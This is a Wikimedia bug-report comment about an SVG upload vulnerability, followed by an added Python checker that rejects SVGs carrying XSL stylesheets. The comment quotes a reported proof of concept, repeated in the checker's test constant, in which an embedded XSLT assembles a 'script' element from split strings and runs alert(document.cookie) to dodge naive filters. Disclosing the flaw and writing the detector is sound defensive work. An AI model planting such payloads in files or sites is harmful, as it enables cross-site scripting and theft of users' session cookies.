https://bugzilla.wikimedia.org/show_bug.cgi?id=29296
--- Comment #4 from Tim Starling <tstarl...@wikimedia.org> 2012-02-27 23:04:43 UTC ---
majinboo <majin...@hackerzvoice.net> reported the following test case to
secur...@wikimedia.org:

<?xml version="1.0"?>
<?xml-stylesheet type="text/xml" href="#stylesheet"?>
<!DOCTYPE doc [ <!ATTLIST xsl:stylesheet id ID #REQUIRED>]>
<svg xmlns="http://www.w3.org/2000/svg">
  <xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
    <xsl:template match="/">
      <xsl:variable name="s"><xsl:value-of select="'s'" /></xsl:variable>
      <xsl:variable name="c"><xsl:value-of select="'cript'" /></xsl:variable>
      <xsl:element name="{$s}{$c}">alert(document.cookie)</xsl:element>
    </xsl:template>
  </xsl:stylesheet>
  <circle fill="red" r="40"></circle>
</svg>

I guess we should not allow XSL stylesheets.
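
An upload-side check for the condition named in the comment above, as an added example that is not part of the bug report and not MediaWiki's own code. It flags the `xml-stylesheet` processing instruction and any element or attribute whose resolved namespace is XSLT, so it does not depend on the `xsl:` prefix or on the literal string `script` appearing in the file. The function name `xsl_findings` and the constant names are assumptions made for the example.

```python
import xml.parsers.expat

XSLT_NS = "http://www.w3.org/1999/XSL/Transform"

# Test case from the report above.
REPORTED_CASE = b"""<?xml version="1.0"?>
<?xml-stylesheet type="text/xml" href="#stylesheet"?>
<!DOCTYPE doc [ <!ATTLIST xsl:stylesheet id ID #REQUIRED>]>
<svg xmlns="http://www.w3.org/2000/svg">
<xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<xsl:variable name="s"><xsl:value-of select="'s'" /></xsl:variable>
<xsl:variable name="c"><xsl:value-of select="'cript'" /></xsl:variable>
<xsl:element name="{$s}{$c}">alert(document.cookie)</xsl:element>
</xsl:template>
</xsl:stylesheet>
<circle fill="red" r="40"></circle>
</svg>"""

# Constructed sample: the same drawing with no stylesheet.
PLAIN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><circle fill="red" r="40"/></svg>'


def xsl_findings(svg_bytes):
    """Return reasons to refuse the file; an empty list means no XSL was seen."""
    findings = []
    parser = xml.parsers.expat.ParserCreate(namespace_separator=" ")

    def on_pi(target, data):
        if target.lower() == "xml-stylesheet":
            findings.append("xml-stylesheet processing instruction: " + data)

    def on_start(name, attrs):
        # With a namespace separator set, expat reports names as "uri local".
        if name.rpartition(" ")[0] == XSLT_NS:
            findings.append("XSLT element: " + name.rpartition(" ")[2])
        if any(a.rpartition(" ")[0] == XSLT_NS for a in attrs):
            findings.append("XSLT attribute on: " + name.rpartition(" ")[2])

    def on_entity_decl(*_args):
        raise ValueError("entity declaration")  # fail closed, never expand

    parser.ProcessingInstructionHandler = on_pi
    parser.StartElementHandler = on_start
    parser.EntityDeclHandler = on_entity_decl
    try:
        parser.Parse(svg_bytes, True)
    except (xml.parsers.expat.ExpatError, ValueError) as exc:
        findings.append("scan aborted: %s" % exc)
    return findings
```

Any non-empty result is a reason to refuse the file, including the case where the scan could not finish.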